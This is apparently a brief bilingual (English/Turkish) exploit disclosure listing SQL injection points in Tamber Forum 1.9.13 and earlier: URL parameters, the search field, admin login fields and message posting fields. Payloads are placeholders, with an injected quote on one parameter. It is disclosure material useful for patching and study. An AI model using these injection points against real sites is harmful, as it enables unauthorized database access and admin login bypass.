ENGLISH

# Title  :   Tamber Forum <= 1.9.13 Multiple SQL Injection Vulnerabilities

# Author :   ajann

# Exploit;

SQL INJECT&#304;ON--------------------------------------------------------

###http://[target]/[path]/show_forum.asp?frm_id=55'SQL TEXT

###http://[target]/[path]/forum_search.asp SEARCH FOR:SQL TEXT

###http://[target]/[path]/admin/index.asp

Email address: 	SQL TEXT
Password: SQLTEXT

###http://[target]/[path]/browse_forum_cat.asp?frm_cat_id=1 SQL TEXT

###post_message.asp

Message Subject: SQL TEXT

Message Text: SQL TEXT

.
..
.....


# ajann,Turkey


TURKISH

# Basl&#305;k          :   Tamber Forum <= 1.9.13 Multiple SQL Injection Vulnerabilities
# Aç&#305;&#287;&#305; Bulan     :   ajann
# Aç&#305;k bulunan dosyalar;

###http://[target]/[path]/show_forum.asp?frm_id=55'SQL SORGUNUZ

###http://[target]/[path]/forum_search.asp SEARCH FOR:SQL SORGUNUZ

###http://[target]/[path]/admin/index.asp

Email address: 	SORGUNUZ
Password: SORGUNUZ

###http://[target]/[path]/browse_forum_cat.asp?frm_cat_id=1 SQL SORGUNUZ

###post_message.asp

Message Subject: SORGUNUZ

Message Text: SORGUNUZ

.
..
.....

Ac&#305;klama: 
K&#305;sacas&#305; bütün dosyalarda : ) bulunan filtrelem eksikli&#287;i nedeniyle dbden bilgi cekilebilmektedir.

# ajann,Turkiye